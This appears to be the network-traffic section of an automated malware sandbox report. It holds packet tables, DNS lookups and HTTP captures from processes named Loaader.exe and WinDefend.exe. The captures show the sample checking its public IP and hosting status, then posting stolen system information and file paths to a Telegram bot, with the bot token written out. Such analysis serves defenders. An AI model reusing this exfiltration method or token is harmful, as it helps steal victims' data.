May 23, 2024 15:34:12.026590109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.026601076 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.026608944 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.026638985 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.026665926 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.027337074 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.027348042 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.027399063 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.027842999 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.028106928 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.028117895 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.028160095 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.030821085 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.030878067 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.030919075 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.031174898 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.031184912 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.031194925 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.031234980 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.031264067 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.031693935 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.031703949 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.031713009 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.031748056 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.031996012 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.032006979 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.032015085 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.032032967 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.032059908 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.032650948 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.032728910 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.032778025 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.032985926 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.033577919 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.033951044 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.034403086 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.034583092 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.034847975 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.034888983 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.035398006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.035432100 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.035716057 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.035952091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.036716938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.036727905 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.036736012 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.036758900 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.036783934 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.037751913 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.037964106 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.038089037 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.038798094 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.038809061 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.038850069 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.042074919 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.042084932 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.042112112 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.042121887 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.042130947 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.042156935 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.042783976 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.042794943 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.042830944 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.043525934 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.043536901 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.043545961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.043574095 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.043602943 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.044289112 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.044774055 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.044781923 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.044816017 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.045408010 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.045439959 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.045811892 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.045821905 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.045830011 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.045839071 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.045861959 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.045887947 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.046715975 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.046727896 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.046736956 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.046771049 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.046983957 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.046993971 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.047036886 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.047384024 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.047641039 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.047692060 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.047801971 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.047843933 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.048116922 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.048198938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.048243999 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.048823118 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.048955917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.049490929 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.049539089 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.050960064 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.050971031 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.050997972 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.051060915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.051099062 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.051263094 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.051459074 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.051661015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.051711082 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.051779032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.051819086 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.052278996 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.052967072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.053586960 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.053596973 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.053637981 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.053668976 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.053833008 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.053950071 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.054383039 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.055113077 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.055123091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.055175066 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.055229902 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.055265903 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.055762053 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.056518078 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.056529045 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.056571960 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.056623936 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.056658983 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.057210922 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.057334900 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.057928085 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.057950974 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.058033943 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.058085918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.058636904 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.058736086 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.059343100 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.059387922 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.059488058 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.059528112 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.060017109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.060028076 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.060059071 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.060600042 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.061259985 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.061269999 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.061316013 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.061417103 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.061455965 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.061538935 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.061752081 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.061947107 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.061953068 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.062306881 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.062432051 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.062475920 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.063112020 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.063153028 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.063230991 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.063416958 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.063942909 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.063987017 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.064047098 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.064083099 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.064527988 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.064635992 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.065357924 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.065368891 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.065409899 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.065479994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.065710068 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.065956116 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.067151070 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.067670107 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.067970991 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.068213940 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.068223953 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.068233013 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.068264008 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.068882942 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.068928003 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.069040060 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.069514990 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.069607973 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.069652081 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.070450068 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.070497036 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.070549965 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.071387053 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.071494102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.071532965 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.072279930 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.072319984 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.072868109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.072877884 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.072915077 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.073472977 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.073587894 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.073628902 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.073781013 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.074191093 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.074888945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.074937105 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:12.074989080 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:12.075022936 CEST	61010	4449	192.168.2.5	66.235.168.242

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 15:33:55.411801100 CEST	192.168.2.5	1.1.1.1	0xfc3b	Standard query (0)	api64.ipify.org	A (IP address)	IN (0x0001)	false
May 23, 2024 15:33:56.363991022 CEST	192.168.2.5	1.1.1.1	0x75dd	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
May 23, 2024 15:35:05.084326982 CEST	192.168.2.5	1.1.1.1	0x4a8d	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
May 23, 2024 15:35:05.573834896 CEST	192.168.2.5	1.1.1.1	0x57d	Standard query (0)	81.189.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
May 23, 2024 15:35:05.717803001 CEST	192.168.2.5	1.1.1.1	0x30c9	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
May 23, 2024 15:35:06.971746922 CEST	192.168.2.5	1.1.1.1	0xd3c9	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 23, 2024 15:33:55.421473026 CEST	1.1.1.1	192.168.2.5	0xfc3b	No error (0)	api64.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
May 23, 2024 15:33:55.421473026 CEST	1.1.1.1	192.168.2.5	0xfc3b	No error (0)	api64.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
May 23, 2024 15:33:55.421473026 CEST	1.1.1.1	192.168.2.5	0xfc3b	No error (0)	api64.ipify.org		104.237.62.213	A (IP address)	IN (0x0001)	false
May 23, 2024 15:33:56.377223969 CEST	1.1.1.1	192.168.2.5	0x75dd	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
May 23, 2024 15:34:04.082087994 CEST	1.1.1.1	192.168.2.5	0x42f4	No error (0)	windowsupdatebg.s.llnwi.net		87.248.204.0	A (IP address)	IN (0x0001)	false
May 23, 2024 15:35:05.094086885 CEST	1.1.1.1	192.168.2.5	0x4a8d	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
May 23, 2024 15:35:05.094086885 CEST	1.1.1.1	192.168.2.5	0x4a8d	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
May 23, 2024 15:35:05.583323002 CEST	1.1.1.1	192.168.2.5	0x57d	Name error (3)	81.189.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
May 23, 2024 15:35:05.749721050 CEST	1.1.1.1	192.168.2.5	0x30c9	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
May 23, 2024 15:35:07.001530886 CEST	1.1.1.1	192.168.2.5	0xd3c9	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
May 23, 2024 15:35:07.001530886 CEST	1.1.1.1	192.168.2.5	0xd3c9	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	61167	104.16.185.241	80	7392	C:\Users\user\AppData\Roaming\Loaader.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 15:35:05.104461908 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
May 23, 2024 15:35:05.557791948 CEST	535	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 13:35:05 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=3hjs3qgfZfnygYuLPvnJYeNzuRpy61CkMqthrUD.xWc-1716471305-1.0.1.1-gP3DpAAuMwCGKEcd70O83NQTNzjiFaxXNZmjwUAdc2.QNyETnYPK0BDDXTCsEC4WzyALCf_.Vya8Tty8EO7ung; path=/; expires=Thu, 23-May-24 14:05:05 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 88856d5b7ef41841-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 0a Data Ascii: 8.46.123.175
May 23, 2024 15:35:06.333869934 CEST	39	OUT	GET / HTTP/1.1 Host: icanhazip.com
May 23, 2024 15:35:06.438815117 CEST	535	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 13:35:06 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=blOqWkq1_sack764g8NcXq5S_B2izzTSSzNMOetvKYg-1716471306-1.0.1.1-waKGr19DYupTTrSElKqM6HtaYcw.k1o3Gy5vZ0Rta4n24CHFiLcnF7FNFmMcnyA5d3QPwVZj7IWrW.bCqwkqFQ; path=/; expires=Thu, 23-May-24 14:05:06 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 88856d60ec7c1841-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 0a Data Ascii: 8.46.123.175
May 23, 2024 15:35:06.759165049 CEST	39	OUT	GET / HTTP/1.1 Host: icanhazip.com
May 23, 2024 15:35:06.918459892 CEST	535	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 13:35:06 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=lXangVRk7TRDGhO9Kwkksw8bvavbyzcSXk1ChV5pa24-1716471306-1.0.1.1-ZtBf1mtiee.WN.xAGTQ.hMvdl8Z4Y5w4Y6edUj2Lo86EV384kDrRK9HNyplkth04EvmkcdbaeDABaqFWcuXMdQ; path=/; expires=Thu, 23-May-24 14:05:06 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 88856d63cf4d1841-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 0a Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	61169	208.95.112.1	80	7392	C:\Users\user\AppData\Roaming\Loaader.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 15:35:05.765999079 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
May 23, 2024 15:35:06.276958942 CEST	175	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 13:35:05 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	64.185.227.155	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:33:56 UTC	65	OUT	GET / HTTP/1.1 Host: api64.ipify.org Connection: Keep-Alive
2024-05-23 13:33:56 UTC	157	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Thu, 23 May 2024 13:33:56 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin
2024-05-23 13:33:56 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:33:57 UTC	220	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 493 Expect: 100-continue Connection: Keep-Alive
2024-05-23 13:33:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:33:57 UTC	493	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 25 30 44 25 30 41 25 46 30 25 39 46 25 39 36 25 41 35 25 32 30 25 32 41 25 32 41 53 79 73 74 65 6d 25 32 30 49 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 41 25 32 41 25 32 41 25 30 44 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 35 42 25 46 30 25 39 46 25 39 32 25 42 42 25 32 30 4f 53 25 35 44 25 33 41 25 32 30 25 32 30 25 32 30 4d 69 63 72 6f 73 6f 66 74 25 32 30 57 69 6e 64 6f 77 73 25 32 30 4e 54 25 32 30 36 2e 32 2e 39 32 30 30 2e 30 25 30 44 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 35 42 25 46 30 25 39 46 25 39 31 25 41 38 25 45 32 25 38 30 25 38 44 25 46 30 25 39 46 25 39 32 25 42 42 25 32 30 4d 61 63 68 69 6e 65 25 32 30 4e 61 6d 65 25 35 Data Ascii: chat_id=1655240967&text=%0D%0A%F0%9F%96%A5%20%2A%2ASystem%20Information%3A%2A%2A%0D%0A%20%20%20%20%20%20%5B%F0%9F%92%BB%20OS%5D%3A%20%20%20Microsoft%20Windows%20NT%206.2.9200.0%0D%0A%20%20%20%20%20%20%5B%F0%9F%91%A8%E2%80%8D%F0%9F%92%BB%20Machine%20Name%5
2024-05-23 13:33:57 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:33:57 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	61006	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:01 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 363 Expect: 100-continue
2024-05-23 13:34:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:01 UTC	363	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 32 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 